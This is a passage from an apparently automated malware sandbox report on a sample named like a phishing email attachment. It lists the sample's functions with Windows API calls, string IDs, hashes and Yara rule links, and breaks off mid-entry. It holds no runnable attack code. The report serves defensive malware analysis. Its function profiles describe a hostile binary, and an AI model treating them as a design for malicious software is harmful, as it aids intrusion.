                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                          • String ID: 0.0.0.0
                                                                                                          • API String ID: 208665112-3771769585
                                                                                                          • Opcode ID: ca9f2288d33561e94b637d2da1a87882bafa393c4e8f3075b843e5a702c53702
                                                                                                          • Instruction ID: 6c868d4bb338fac038fad6248184b968a5a19bda3e8697c669d9cfd489b7f85a
                                                                                                          • Opcode Fuzzy Hash: ca9f2288d33561e94b637d2da1a87882bafa393c4e8f3075b843e5a702c53702
                                                                                                          • Instruction Fuzzy Hash: A111D531500114EFCB20AB309C4AFEA77BCEB02721F0481B6F45A96192EF7D9A81C665
                                                                                                          Function 007B4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • timeGetTime.WINMM ref: 007B4F7A
                                                                                                            • Part of subcall function 0077049F: timeGetTime.WINMM(?,75A8B400,00760E7B), ref: 007704A3
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 007B4FA6
                                                                                                          • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 007B4FCA
                                                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 007B4FEC
                                                                                                          • SetActiveWindow.USER32 ref: 007B500B
                                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007B5019
                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 007B5038
                                                                                                          • Sleep.KERNEL32(000000FA), ref: 007B5043
                                                                                                          • IsWindow.USER32 ref: 007B504F
                                                                                                          • EndDialog.USER32(00000000), ref: 007B5060
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                          • String ID: BUTTON
                                                                                                          • API String ID: 1194449130-3405671355
                                                                                                          • Opcode ID: ea748c286fcb1d859f21acb2ee54071b7d835c4814cb0ec4fc32974bd8f80821
                                                                                                          • Instruction ID: db60c69e7eadb4619d68ddbb9bf304aacba7a380f71d3abf1c8f1917e41ea57b
                                                                                                          • Opcode Fuzzy Hash: ea748c286fcb1d859f21acb2ee54071b7d835c4814cb0ec4fc32974bd8f80821
                                                                                                          • Instruction Fuzzy Hash: 16216D71206605EFE7106F30ED89BE63B7EFF45745B089025F146821B1EB798D608A66
                                                                                                          Function 007BD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                          • CoInitialize.OLE32(00000000), ref: 007BD5EA
                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007BD67D
                                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 007BD691
                                                                                                          • CoCreateInstance.OLE32(007E2D7C,00000000,00000001,00808C1C,?), ref: 007BD6DD
                                                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007BD74C
                                                                                                          • CoTaskMemFree.OLE32(?,?), ref: 007BD7A4
                                                                                                          • _memset.LIBCMT ref: 007BD7E1
                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 007BD81D
                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007BD840
                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 007BD847
                                                                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 007BD87E
                                                                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 007BD880
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1246142700-0
                                                                                                          • Opcode ID: d102ac0595bcd0883d19221fd41017d3f68a3b914c9974226af711600eb39224
                                                                                                          • Instruction ID: 386308a7a8a650c751cdefbe830f06d192869a0f8ea1b99da44435387d79d4df
                                                                                                          • Opcode Fuzzy Hash: d102ac0595bcd0883d19221fd41017d3f68a3b914c9974226af711600eb39224
                                                                                                          • Instruction Fuzzy Hash: 62B1FA75A00109EFDB14DFA4C888EAEBBB9FF48314B148469F90ADB261DB34ED45CB50
                                                                                                          Function 007AC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 007AC283
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 007AC295
                                                                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 007AC2F3
                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 007AC2FE
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 007AC310
                                                                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 007AC364
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 007AC372
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 007AC383
                                                                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 007AC3C6
                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 007AC3D4
                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007AC3F1
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 007AC3FE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                                          • String ID:
                                                                                                          • API String ID: 3096461208-0
                                                                                                          • Opcode ID: c6ea2152c5bf891d271d06e21493100c7919cab4037a7ed07a1b360aba025939
                                                                                                          • Instruction ID: e412933b1eb13e49cf6f39c193fb8d4688135b3278e996b914686f3e5612ec85
                                                                                                          • Opcode Fuzzy Hash: c6ea2152c5bf891d271d06e21493100c7919cab4037a7ed07a1b360aba025939
                                                                                                          • Instruction Fuzzy Hash: 26513171B00205BBDF18CFA9DD95AAEBBB5EB88711F14C12DF516D6290D7749D008B14
                                                                                                          Function 0075201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00751B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00752036,?,00000000,?,?,?,?,007516CB,00000000,?), ref: 00751B9A
                                                                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007520D3
                                                                                                          • KillTimer.USER32(-00000001,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0075216E
                                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 0078BCA6
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0078BCD7
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0078BCEE
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0078BD0A
                                                                                                          • DeleteObject.GDI32(00000000), ref: 0078BD1C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 641708696-0
                                                                                                          • Opcode ID: 18540fe15d4ecd3621c367ff108e342a05b52224f6e0094c255af1b42b2b384d
                                                                                                          • Instruction ID: a0e34f31b08314948be341f1c2a71df8b69b3ac621855a08d35a4c1f8fdeeb2f
                                                                                                          • Opcode Fuzzy Hash: 18540fe15d4ecd3621c367ff108e342a05b52224f6e0094c255af1b42b2b384d
                                                                                                          • Instruction Fuzzy Hash: 43618031611A00DFCB35AF14D948BA6B7F1FF81313F508429E946879B1C7B8A896DB60
                                                                                                          Function 007521A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 007525DB: GetWindowLongW.USER32(?,000000EB), ref: 007525EC
                                                                                                          • GetSysColor.USER32(0000000F), ref: 007521D3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ColorLongWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 259745315-0
                                                                                                          • Opcode ID: e1aa3530324bc9d580effc32c9271d4a864e160e203e9cd749df1b2533ea505d
                                                                                                          • Instruction ID: 98d14ba4563649b9a67c77efbb77360e64ee6694d74f7ac374d7373720c737a3
                                                                                                          • Opcode Fuzzy Hash: e1aa3530324bc9d580effc32c9271d4a864e160e203e9cd749df1b2533ea505d
                                                                                                          • Instruction Fuzzy Hash: 5A419235101544DEDB215F28DC88BF93B65FB07332F158266FE668A1E2C77A8C46DB21
                                                                                                          Function 007BA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CharLowerBuffW.USER32(?,?,007DF910), ref: 007BA90B
                                                                                                          • GetDriveTypeW.KERNEL32(00000061,008089A0,00000061), ref: 007BA9D5
                                                                                                          • _wcscpy.LIBCMT ref: 007BA9FF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                          • API String ID: 2820617543-1000479233
                                                                                                          • Opcode ID: 441899b11ab6ea769bfa650bff08afe2aa0ad1b5348297b07d3aef1d5b35208b
                                                                                                          • Instruction ID: 1370d74e98239475cc951dc2b17c6e846e5144a7ce8d7e6e9c6c95fe71f66899
                                                                                                          • Opcode Fuzzy Hash: 441899b11ab6ea769bfa650bff08afe2aa0ad1b5348297b07d3aef1d5b35208b
                                                                                                          • Instruction Fuzzy Hash: 64519F31508301EBC704EF14C896BEFB7A5FF84740F15882DF995972A2DB79A909CA93
                                                                                                          Function 00759837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __i64tow__itow__swprintf
                                                                                                          • String ID: %.15g$0x%p$False$True
                                                                                                          • API String ID: 421087845-2263619337
                                                                                                          • Opcode ID: 23b577f664f10cf0a3de67514add231d98ddc002c6651ec1683c7c421b6e28ac
                                                                                                          • Instruction ID: faf92a13d6551fc70448290028197e1342bbfcd0d5f9f3803153ed567aefbd52
                                                                                                          • Opcode Fuzzy Hash: 23b577f664f10cf0a3de67514add231d98ddc002c6651ec1683c7c421b6e28ac
                                                                                                          • Instruction Fuzzy Hash: A741B771600205EEDB24EF74D845EB673E8FF46310F2444BEE949D7291EA79A9458B10
                                                                                                          Function 007D7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007D716A
                                                                                                          • CreateMenu.USER32 ref: 007D7185
                                                                                                          • SetMenu.USER32(?,00000000), ref: 007D7194
                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D7221
                                                                                                          • IsMenu.USER32(?), ref: 007D7237
                                                                                                          • CreatePopupMenu.USER32 ref: 007D7241
                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007D726E
                                                                                                          • DrawMenuBar.USER32 ref: 007D7276
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                          • String ID: 0$F
                                                                                                          • API String ID: 176399719-3044882817
                                                                                                          • Opcode ID: 7c13e300206251cecd59774d33f645273c02f190b0b4ad11b710455793471cbc
                                                                                                          • Instruction ID: ae578aefd4406960c6f3b7b52d919e36ac448fb0ddddb92e91a7177ebfb2d035
                                                                                                          • Opcode Fuzzy Hash: 7c13e300206251cecd59774d33f645273c02f190b0b4ad11b710455793471cbc
                                                                                                          • Instruction Fuzzy Hash: 62415B74A01209EFDB24DF64D984EDA7BB9FF49310F14412AF94697361E735A920CF90
                                                                                                          Function 007D74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007D755E
                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 007D7565
                                                                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007D7578
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 007D7580
                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 007D758B
                                                                                                          • DeleteDC.GDI32(00000000), ref: 007D7594
                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 007D759E
                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007D75B2
                                                                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007D75BE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                          • String ID: static
                                                                                                          • API String ID: 2559357485-2160076837
                                                                                                          • Opcode ID: 074ff3340f71a4b782b1469b9616f083abd09f1e2a336d36a71f52834ab7194d
                                                                                                          • Instruction ID: 84025f77232c9a7240643ff8633fe14836536b4c6b183e3be059b45728b42646
                                                                                                          • Opcode Fuzzy Hash: 074ff3340f71a4b782b1469b9616f083abd09f1e2a336d36a71f52834ab7194d
                                                                                                          • Instruction Fuzzy Hash: 73318F31105218FBDF159F64EC08FDA3B79FF09321F118226FA16A22A0D739D821DB64
                                                                                                          Function 00776E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00776E3E
                                                                                                            • Part of subcall function 00778B28: __getptd_noexit.LIBCMT ref: 00778B28
                                                                                                          • __gmtime64_s.LIBCMT ref: 00776ED7
                                                                                                          • __gmtime64_s.LIBCMT ref: 00776F0D
                                                                                                          • __gmtime64_s.LIBCMT ref: 00776F2A
                                                                                                          • __allrem.LIBCMT ref: 00776F80
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00776F9C
                                                                                                          • __allrem.LIBCMT ref: 00776FB3
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00776FD1
                                                                                                          • __allrem.LIBCMT ref: 00776FE8
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00777006
                                                                                                          • __invoke_watson.LIBCMT ref: 00777077
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 384356119-0
                                                                                                          • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                          • Instruction ID: b72a48ae43ca26d461aba0910cee8dccf7a46b542525b49dd912a3011e500386
                                                                                                          • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                          • Instruction Fuzzy Hash: BB71D776A40B17EBDF18AE68DC45B5AB3A4BF047A4F14C529F518D6281F7B8D900C790
                                                                                                          Function 007B2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007B2542
                                                                                                          • GetMenuItemInfoW.USER32(00815890,000000FF,00000000,00000030), ref: 007B25A3
                                                                                                          • SetMenuItemInfoW.USER32(00815890,00000004,00000000,00000030), ref: 007B25D9
                                                                                                          • Sleep.KERNEL32(000001F4), ref: 007B25EB
                                                                                                          • GetMenuItemCount.USER32(?), ref: 007B262F
                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 007B264B
                                                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 007B2675
                                                                                                          • GetMenuItemID.USER32(?,?), ref: 007B26BA
                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007B2700
                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B2714
                                                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B2735
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 4176008265-0
                                                                                                          • Opcode ID: 6d5c7ad479b3fab094497a6bbd6b41e278f687914628762fed3eb0703ccf3348
                                                                                                          • Instruction ID: 5058d847a21915b3517a7c8f7414cc1dd2e8bf593dd8541c4d14e2439ad5c783
                                                                                                          • Opcode Fuzzy Hash: 6d5c7ad479b3fab094497a6bbd6b41e278f687914628762fed3eb0703ccf3348
                                                                                                          • Instruction Fuzzy Hash: A961A170902249EFDB21CF64DC88EFE7BB8FB45308F144459E95293252DB39AD16DB21
                                                                                                          Function 007D6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007D6FA5
                                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007D6FA8
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007D6FCC
                                                                                                          • _memset.LIBCMT ref: 007D6FDD
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007D6FEF
                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007D7067
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$LongWindow_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 830647256-0
                                                                                                          • Opcode ID: ea7609c4b1e4535e2ba37a069b80428a070f67ba7d64f34fc368a43e3352bfe6
                                                                                                          • Instruction ID: fdca3a2d6a631d7b2976a04530d09fef8670917c075123f01e73a5deb468b49c
